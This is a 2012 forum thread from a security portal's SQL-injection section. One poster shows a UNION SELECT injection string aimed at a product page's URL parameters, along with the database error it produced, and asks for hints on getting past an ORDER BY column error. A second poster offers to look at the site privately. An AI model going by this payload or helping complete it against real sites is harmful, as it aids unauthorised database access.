|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 56
Members: 0
Total: 56
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Sql Injection "Unknow Column" Help |
|
Posted: Fri Feb 24, 2012 11:21 am |
|
|
caoload |
Beginner |
|
|
Joined: Feb 24, 2012 |
Posts: 1 |
|
|
|
|
|
|
|
Hi. I am stuck here
when try to union:
Code: | http://www.site.com/product.php?id=1427&products_id=603 union select 1,2,3-- |
result is:
Code: | 1054 - Unknown column 'products_extra_fields_order' in 'order clause'
SELECT pef.products_extra_fields_name as name, ptf.products_extra_fields_value as value ,pef.products_extra_fields_status as status FROM products_extra_fields pef LEFT JOIN products_to_products_extra_fields ptf ON ptf.products_extra_fields_id=pef.products_extra_fields_id WHERE ptf.products_id=603 union select 1,2,3# and ptf.products_extra_fields_value<>'' and (pef.languages_id='0' or pef.languages_id='1') ORDER BY products_extra_fields_order |
Can anyone help me with this? At least some hints..
Thanks in advance. |
|
|
|
|
Posted: Sat Feb 25, 2012 12:58 am |
|
|
rmill54 |
Regular user |
|
|
Joined: Jul 15, 2009 |
Posts: 19 |
|
|
|
|
|
|
|
pm me the site, i will check it and reply you |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|